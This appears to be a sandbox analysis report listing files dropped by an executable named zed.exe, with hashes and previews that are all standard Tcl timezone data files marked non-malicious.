                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.883092265054605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/+L6ELzE5FNMXGm2OHnz8eoHvZT5lxV/uUQwGN0VQVFv:SlSWB9eg/+L/EJDm2OHnz8eoHvZT5rdI
                                                                                                                                                                                                                                            MD5:4DF975C040D78FA8F9C92E5565D63A73
                                                                                                                                                                                                                                            SHA1:48488F076871530D32278084F1C9CB90CB1E6AB4
                                                                                                                                                                                                                                            SHA-256:9FAC69DC609CC6074ECD67E0BE8AE62E33D8D9C7F055A3E0DEE1430C7FFC54F6
                                                                                                                                                                                                                                            SHA-512:880B920FB51F48731BA8C741B9583038A3276221C55F1CE0B464D2797D71EF9D22B4E166841BAB0544B7091CE683697BFCA5A4235FF1E6264B0619DBDD4BB619
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Maldives) {.. {-9223372036854775808 17640 0 LMT}.. {-2840158440 17640 0 MMT}.. {-315636840 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):272
                                                                                                                                                                                                                                            Entropy (8bit):4.5144164346164715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/+L/GDm2OHlNnoH9SvulvSNFF+c0FSFFMVhvSNFFVBjvVFSFFVGlvSN:MB86+L/CmdHlNnCy6qB0FScZq9BjVFSL
                                                                                                                                                                                                                                            MD5:05362B6A17C5F4F4E8CBE5A676D5D0DE
                                                                                                                                                                                                                                            SHA1:84675D5E8D1425A5E9DB07D1BC1E6A5921B5AC91
                                                                                                                                                                                                                                            SHA-256:A2B1B93CBEECBD900ED71E61A4932509EB52688E97A6015DAD067066D0D42072
                                                                                                                                                                                                                                            SHA-512:351D2BC5F5888D8E842BF160D11D57E059811186D63B0413061768C7FE348CECB700748A0C0125F0ABCBB039FC74FF7BEEFDD42088BA1E28C785E545ED2CDF24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Mauritius) {.. {-9223372036854775808 13800 0 LMT}.. {-1988164200 14400 0 +04}.. {403041600 18000 1 +04}.. {417034800 14400 0 +04}.. {1224972000 18000 1 +04}.. {1238274000 14400 0 +04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.828945679595274
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6ELzO1h4DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/+L/O1hm
                                                                                                                                                                                                                                            MD5:8ABBEC0E138C1A68CB5D096E822DE75E
                                                                                                                                                                                                                                            SHA1:E9C5CE1A249F6DC0F6EDBB3F5B00F3106E3BD6CA
                                                                                                                                                                                                                                            SHA-256:845C45FD7B6F0604B03A3C72DB117878B568FB537BCA078304727964157B96AB
                                                                                                                                                                                                                                            SHA-512:15790CCA70140D3139F3E2A202DC8F12E68466A367C68458D6A78CDDC7822FB5EDB87D630926B51F3DE48D95DE7CA3FCB946CD7B762FE5B15866DAA9DBA40B46
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Mayotte) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                                            Entropy (8bit):4.825214661273383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/+L6ELsAceh4WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/+Lj4wKQ3
                                                                                                                                                                                                                                            MD5:7B22FE05231A5721C939B6018F8A2814
                                                                                                                                                                                                                                            SHA1:E272C25E79ABE705B2DB106D70DEAB3245EA9D35
                                                                                                                                                                                                                                            SHA-256:5560B0D4A2D8A13D9FE9787FFFE31200D405A8C875F046C8FDDF850AF98662B6
                                                                                                                                                                                                                                            SHA-512:26244855D029151B84A4D57E2FA69632B4F19F8C00B2E500A394D76A29857BE2A412344794BA0DFF50A2863FF17889210A151D0E231A67E55091F4909EC4AE79
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Indian/Reunion) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):166
                                                                                                                                                                                                                                            Entropy (8bit):4.809541513808179
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8g5YFeovXHAIgNqjyVHRL/+XiMr4WFKBpv:SlSWB9vsM3yA5oPHAIgcjeHN/+Xvr4wY
                                                                                                                                                                                                                                            MD5:A90C26358FEF60E49044E3BE02866FAC
                                                                                                                                                                                                                                            SHA1:137AC8CCA23F39E7A16C4050EA9A3A8731E9AAD7
                                                                                                                                                                                                                                            SHA-256:FE7F4453CB5F6B81B23C1C795356B91FE319F0762BE7868FAFE361DB1F9C2A2B
                                                                                                                                                                                                                                            SHA-512:D6C74CACF69D29E14CB46E5DD885234AC50EE2E258E0C5E3AC76465061622F064F974D33E91A6A020B9D618D90799DDA6EB1EA53022EDB6E26A9CB6ADFE0AA30
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Tehran)]} {.. LoadTimeZoneFile Asia/Tehran..}..set TZData(:Iran) $TZData(:Asia/Tehran)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):4.8290104377288925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/+WXnMr4WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/+zr4wKY+
                                                                                                                                                                                                                                            MD5:6BCC43951637D86ED54585BE0819E39C
                                                                                                                                                                                                                                            SHA1:6F04F306B3AB2A6419377294238B3164F86EF4A3
                                                                                                                                                                                                                                            SHA-256:805105F5F17B78929F8476BAE83ED972128633FF6F74B7748B063E3C810C27A6
                                                                                                                                                                                                                                            SHA-512:ABB9F4308BF4BD5C62C215A7ECD95042CBFB3005AF1E75F640962B022574C930DD5A12CD0CE0AF8A3D7E38B999E37C3A45A55091683F6A87E9D0CDA9EE417293
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Israel) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.722012123002917
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx00EIECWXHAIg200EIE/vHRL/9S//2IAcGE0EIESvn:SlSWB9vsM3y795VHAIgp95HN/029095c
                                                                                                                                                                                                                                            MD5:1F020341AD51AA82794B8018F214DE0D
                                                                                                                                                                                                                                            SHA1:4414E56C1277B4D31FE557F8652D522C0594F4B2
                                                                                                                                                                                                                                            SHA-256:F01B00D52BD7B2694BF5CB55A17028C30A41BD22A774CA54740E8B1DDE4FCB2E
                                                                                                                                                                                                                                            SHA-512:CC41848A851D4992AE9F27C38669CB87CE2FD05A33AB6989EA21AFCB1A2707DE0CB4D62BCC45E536DD944859991D7564847205F47509A42D41932370496A77D7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Jamaica)]} {.. LoadTimeZoneFile America/Jamaica..}..set TZData(:Jamaica) $TZData(:America/Jamaica)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                                                            Entropy (8bit):4.8422204749795545
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8aofXHAIgNqsRL/9hM7/4WFK9vn:SlSWB9vsM3ypPHAIgcsN/4r4wKNn
                                                                                                                                                                                                                                            MD5:9554A65BFFCFFCFB2C1588569BB4638E
                                                                                                                                                                                                                                            SHA1:B377ECB04586396D37093856AEF8BBDC93192F66
                                                                                                                                                                                                                                            SHA-256:98DBD07AE3B9251B9091F4D265336CE98BDFB492AF863C1F3FF25248A2CADF35
                                                                                                                                                                                                                                            SHA-512:E2E761B8B1995B68721BC714A546E0F45EEC025FAF81DE579FF0D73D37783D0E031B9E78BA2FAC6B097E3673C47AFB8761FBC58E42E33018FD44B77F2871E0C6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Tokyo)]} {.. LoadTimeZoneFile Asia/Tokyo..}..set TZData(:Japan) $TZData(:Asia/Tokyo)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.810216093939366
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG1/EOM23vXHAIgObT1/EOMH6RL/8/FMKpUDH1/Ex:SlSWB9vsM3yc1EiPHAIgOb1E+N/8xMEx
                                                                                                                                                                                                                                            MD5:05C0C40F2AA456F580EAAFC4F7E49B56
                                                                                                                                                                                                                                            SHA1:5796A9122693B2D6010BC5E617A6091F46330B0C
                                                                                                                                                                                                                                            SHA-256:85E95363ACF468043CD5146927A97B2D9E3B141EDA0A7993DADA9382D1D6DD54
                                                                                                                                                                                                                                            SHA-512:2155F8E3EB73312F0AFD5CDDF4B19EBB67A15658101870C2CEDF96955470DBC7B30F34E143D9C14CBFA7A138F63324009581BD0B807AE295C68588CA0470D7AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Kwajalein)]} {.. LoadTimeZoneFile Pacific/Kwajalein..}..set TZData(:Kwajalein) $TZData(:Pacific/Kwajalein)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.829980800076139
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsbKJqYkyXHAIgNGEnKJp0ARL/7beDcbKJ6v:SlSWB9vsM3y7JSHAIgNTxAN/PeDE
                                                                                                                                                                                                                                            MD5:4D44D88336212E162CCEFADE6321EDBC
                                                                                                                                                                                                                                            SHA1:B9EE7AFE26DC61AA9EA37EB99A3C10DD176E8063
                                                                                                                                                                                                                                            SHA-256:F776839C1999056E6A0D2ECFDF9054FC309454AFDFF8E8BC803F33EC423B7361
                                                                                                                                                                                                                                            SHA-512:FDDCBD194DE07B51DEBBDEF4FD96762EE3507117443FB9F7975FB56E0AE97B0D1F8657FE26B092021FB12B5A5D3EFFAB9E0A54B1C2AFCEC1029855442A0A95AB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Tripoli)]} {.. LoadTimeZoneFile Africa/Tripoli..}..set TZData(:Libya) $TZData(:Africa/Tripoli)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7736
                                                                                                                                                                                                                                            Entropy (8bit):3.799706947156251
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:aJCP8D3pCS2JWk55EyqJNSPTub3NDOyFyJYVtLbTxdqs0xcQVq+O7JSAmwQZjltB:FSyWBSPTujlOyqc3JuzVNvTN
                                                                                                                                                                                                                                            MD5:02B993B4A6956014A2DB844E8A5498C0
                                                                                                                                                                                                                                            SHA1:378333547254AC43BEB4FA2CBC24B8DE241B3078
                                                                                                                                                                                                                                            SHA-256:DF45F5414F1636B1856C7534BB5F3D4387C32D56283A68BB47D8C48C1DDAD5BC
                                                                                                                                                                                                                                            SHA-512:CC3ABCC1FB5ABD10A685F140931DE38D6875142D3595F8D9A581F5B31A7F354FA4CCC9727B69F58E0D2F773EA0F76D9ACFDF7ACBAFC6BAA6E93A46EAE8F18672
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MET) {.. {-9223372036854775808 3600 0 MET}.. {-1693706400 7200 1 MEST}.. {-1680483600 3600 0 MET}.. {-1663455600 7200 1 MEST}.. {-1650150000 3600 0 MET}.. {-1632006000 7200 1 MEST}.. {-1618700400 3600 0 MET}.. {-938905200 7200 1 MEST}.. {-857257200 3600 0 MET}.. {-844556400 7200 1 MEST}.. {-828226800 3600 0 MET}.. {-812502000 7200 1 MEST}.. {-796777200 3600 0 MET}.. {-781052400 7200 1 MEST}.. {-766623600 3600 0 MET}.. {228877200 7200 1 MEST}.. {243997200 3600 0 MET}.. {260326800 7200 1 MEST}.. {276051600 3600 0 MET}.. {291776400 7200 1 MEST}.. {307501200 3600 0 MET}.. {323830800 7200 1 MEST}.. {338950800 3600 0 MET}.. {354675600 7200 1 MEST}.. {370400400 3600 0 MET}.. {386125200 7200 1 MEST}.. {401850000 3600 0 MET}.. {417574800 7200 1 MEST}.. {433299600 3600 0 MET}.. {449024400 7200 1 MEST}.. {465354000 3600 0 MET}.. {481078800 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                            Entropy (8bit):4.902637155364683
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/6xtNMXGm2OHrXV4foAov:SlSWB9eg/6lDm2OHrCAAov
                                                                                                                                                                                                                                            MD5:36119516E87814F3C219193069CD6A90
                                                                                                                                                                                                                                            SHA1:BDB25531B30E6FC454100F37177EC9D4A0FB4E39
                                                                                                                                                                                                                                            SHA-256:E57746D5DB479A8B30973F2BC16E2B8DFB6E2BFAECBFF0FB956F04526E4B935B
                                                                                                                                                                                                                                            SHA-512:2730C5DABA0B2CCFD32A799C48EE07351659F51B9C2B91DCD145675AF276F2D0B5AA51ACF7D283C0DC236D3AFA3A75E58EB9F970B1831A6E36F02139CAF6A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MST) {.. {-9223372036854775808 -25200 0 MST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.8405400251137207
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:T1ktwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:TswDPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:87B3BCD4A793BA383889ECFDB44C846E
                                                                                                                                                                                                                                            SHA1:3EA34B5E6E3078A9501653BA069D5E5E879D7FE4
                                                                                                                                                                                                                                            SHA-256:A5DEB89D59613D9A54C1E146056A805B3DE9F2A2593AEC2B8A25F863328699C0
                                                                                                                                                                                                                                            SHA-512:AA4DAC2614661EF18A2A60A5BD4D5BBBCCB5D721F90A25E9D11C5B6AF8C39FD475B3E23894719E2F8F74469F13D5492FF31DDD193D9E3172182FBCBCDD860A41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:MST7MDT) {.. {-9223372036854775808 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1 MDT}.. {247046400 -25200 0 MST}.. {262774800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.884776849010803
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/6AdMSKBbh4IAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/68K5h490m
                                                                                                                                                                                                                                            MD5:3050A0100A2313C1D3AB4278B464F17A
                                                                                                                                                                                                                                            SHA1:1A140447B3972900F13768659FD6979F68126E97
                                                                                                                                                                                                                                            SHA-256:F8CA38A845CD01BF785EE222277DAD9325AB6BD17E44A362C450855AEB522814
                                                                                                                                                                                                                                            SHA-512:C91C4BF2318C50D473E6051855C12F0E11CBAA8580B88115CDDE054D36476A1D8DDC5D17A7A123BD84148C20B96BD839511EAD573F5FD2C9A8556646B9CDE5E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:Mexico/BajaNorte) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):191
                                                                                                                                                                                                                                            Entropy (8bit):4.8897674180962145
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0zjRJ+ovXHAIg20zjRJ8yHRL/6AdMPCoQIAcGEzjy:SlSWB9vsM3y7zjRJvHAIgpzjRJ8yHN/Z
                                                                                                                                                                                                                                            MD5:FAFD9727A0E153AFCB726690D215DA76
                                                                                                                                                                                                                                            SHA1:3CD3B2737FC781F38DE26E255968CBB88B773CBF
                                                                                                                                                                                                                                            SHA-256:2E6E32A40487F0146B59150B66FF74901CA853B12D47922819AF23EEA5B4149C
                                                                                                                                                                                                                                            SHA-512:76D110494D4EB76961C818B2A2CCB2303B31DA161664FA712C87B95B81DE7B8F3E50DC7B2836C6ECC6437AE9595668E62E4E706F1B343EFEA12C32210F113540
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Mazatlan)]} {.. LoadTimeZoneFile America/Mazatlan..}..set TZData(:Mexico/BajaSur) $TZData(:America/Mazatlan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.877941255622543
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7zBDSHAIgpzBx6N/6BXl490zBf:MByMYzppzH6t6Bi90z1
                                                                                                                                                                                                                                            MD5:29ACBFCD0FD521EC0C9523906B9E2252
                                                                                                                                                                                                                                            SHA1:BBC1AD3F78CAA634A2F0BC38059975EF8E4A2CE9
                                                                                                                                                                                                                                            SHA-256:2DFF1B83FECFAD5C27EC47B206696C29B91398F8185B5D406A66FA9E0AECA93F
                                                                                                                                                                                                                                            SHA-512:802502010CFB6F1F4E60C22ECB0E6CA22750975E5838BE7E7DC9D12EA019CB6508F0F87465A113A98356CC9E145E32E6633AE2B45B93412A358C4AD13E923EFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Mexico_City)]} {.. LoadTimeZoneFile America/Mexico_City..}..set TZData(:Mexico/General) $TZData(:America/Mexico_City)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.888611285267583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG/u4WXHAIgObT/KvRRL/5E1nUDH/uov:SlSWB9vsM3ycqXHAIgObOvRN/iy
                                                                                                                                                                                                                                            MD5:92548E239012515D756E002768CA876A
                                                                                                                                                                                                                                            SHA1:6BDC73DBD7356C3F82C5C76E6E2D58656FA9E21D
                                                                                                                                                                                                                                            SHA-256:E22D629D53C54960AD156C377DE0AE461C27F554990A3D1305724CA8F869BCE4
                                                                                                                                                                                                                                            SHA-512:42AD074EE08E083EE91270F203707698A8B3308005C94514B8B2D950F4C6F0B37D7D32973EC9F6AB49A0875209076FB40341B31433A27E47B3CC0EA711ECE321
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:NZ) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.881663364410736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG9WQ+DyXHAIgObT9WQiovRL/5AmtBFB/pUDH9WQg:SlSWB9vsM3ycwQ+DSHAIgObwQTN/zzJ7
                                                                                                                                                                                                                                            MD5:3811C133C6311E33FDAF93660E1EAED5
                                                                                                                                                                                                                                            SHA1:64756FF877B2EB91BAED2889B3924DAB6784DF43
                                                                                                                                                                                                                                            SHA-256:83F4CA3522B64F9B151EDEFAE53E0F28C2E6C4CE16D0982186B3344F2A268724
                                                                                                                                                                                                                                            SHA-512:7724D6CD08E13E116CCDF073F86CE317C0D4A849C5FE81DF3127D435704507FBF554BFC6E7A50CCA3852F6001D8654B7FF90466878DB8C3298338BE16149FD32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Chatham)]} {.. LoadTimeZoneFile Pacific/Chatham..}..set TZData(:NZ-CHAT) $TZData(:Pacific/Chatham)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):4.8545620422964015
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/5vf1+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/pd+90+B
                                                                                                                                                                                                                                            MD5:5E9F3294F68873BF503F3DDDDF6713B0
                                                                                                                                                                                                                                            SHA1:954CD6F123C043E64F5E49733327E2C78877BDFB
                                                                                                                                                                                                                                            SHA-256:2CC8CE235F2EE3160E6AFD04A4E28AA0312494EBB6FED08D8CC81D414EC540EE
                                                                                                                                                                                                                                            SHA-512:200FC489989CA57219D5B28FB135BE5BDAC67239F3D243C496545D86D68089E51856CEAC4D2E700C0E47BAE4D5FEAB18A367C554235615B2B860F4E5E1BB08C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:Navajo) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):171
                                                                                                                                                                                                                                            Entropy (8bit):4.902914099699953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/nL75h4WFKdy:SlSWB9vsM3yMPHAIgO8AN/H5h4wKU
                                                                                                                                                                                                                                            MD5:87C439DC623BF5C7EB01ADA6E67FB63A
                                                                                                                                                                                                                                            SHA1:1CC357558E09CDEA49F821826D2AEA9A6EF2C824
                                                                                                                                                                                                                                            SHA-256:6A5BAA9CA54B2A2C6D21287443BE0B1064AA79B5C4C62939933F8A0AD842B73E
                                                                                                                                                                                                                                            SHA-512:E628B8F1C967AABAEFBB68A33416F6FE47422970BA18414BB3396AC063E65A4DC892595D4071395194AF320633EE915A494E1F8D4216EE8194A034739D275C49
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:PRC) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8505
                                                                                                                                                                                                                                            Entropy (8bit):3.836877329152454
                                                                                                                                                                                                                                            Encrypted:false
